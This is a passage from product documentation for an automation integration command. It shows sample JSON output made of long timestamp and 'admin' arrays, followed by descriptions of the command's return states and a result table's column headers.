\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:39-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:51-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:49-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:50-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:50-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:50-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:50-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:50-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:50-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:51-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:51-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:51-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:35-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:35-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:35-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:35-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:35-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:58:11-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:35-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:35-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:35-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:35-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:36-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:58:08-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:57:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:57:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:57:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:36-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:57:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:57:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:57:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:57:52-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:36-08:00\\\",\
\r\\n\\t\\t\\t\\\"2018-02-14T13:24:36-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:36-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:36-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:36-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:24:36-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:56:17-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:56:17-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:56:18-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:56:17-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:25:11-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:25:11-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:25:11-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:25:11-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:25:11-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:25:11-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:25:11-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:25:11-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:25:11-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:38-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08
:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:38-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:57:51-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:18-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:18-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:18-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:55:59-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:56:00-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:57:44-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T10:56:17-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15
:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:18:34-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:20-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:34-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:34-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:34-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:34-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:34-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T11:48:13-07:00\\\",\\r\\n\\t\\t\\t\\\"2019
-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:18-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:18-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:40-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:40-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:41-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:41-08:00\\\"\\r\\n\\t\\t]\"",
    "modifiedBy": "\"[\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n
\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\
n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\
\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\"\\r\\n\\t\\t]\"",
    "modifiedOn": "\"[\\r\\n\\t\\t\\t\\\"2018-02-14T13:00:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:00:41-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:00:41-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:19-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:19-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:41-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:20-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:20-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:20-08:00\\\"\\r\\n\\t\\t]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| ID | NAME | DESCRIPTION | CONDITIONSEXP | GROUPNAME | USERNAME | DATABASETYPE | TARGET | CREATEDBY | CREATEDON | MODIFIEDBY | MODIFIEDON |
